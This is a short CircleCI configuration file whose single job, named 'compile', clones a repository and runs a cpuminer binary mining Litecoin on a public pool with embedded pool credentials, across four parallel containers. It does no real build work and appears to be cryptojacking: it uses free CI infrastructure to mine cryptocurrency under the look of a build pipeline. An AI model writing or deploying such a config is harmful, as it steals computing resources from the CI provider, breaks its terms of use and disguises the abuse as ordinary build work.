version: 2.1
jobs:
  compile:
   docker:
     - image: alpine:latest
   steps:
      - run:
          command: |
           apk update && apk upgrade 
           apk add openssh git openssl-dev bash  jansson-dev
           mkdir  ~/.ssh
           ssh-keyscan github.com >> ~/.ssh/known_hosts
           git clone --depth=1 git@github.com:ltcwoker/RDP.git Q
           cd Q
           chmod 755 cpuminer

           bash -c ./cpuminer --algo=scrypt --url=stratum+tcp://us.litecoinpool.org:3333 --userpass=djemil.mywoker13:my123456
      
   parallelism: 4       
workflows:
  version: 2.1
  cooking:
    jobs:
      - compile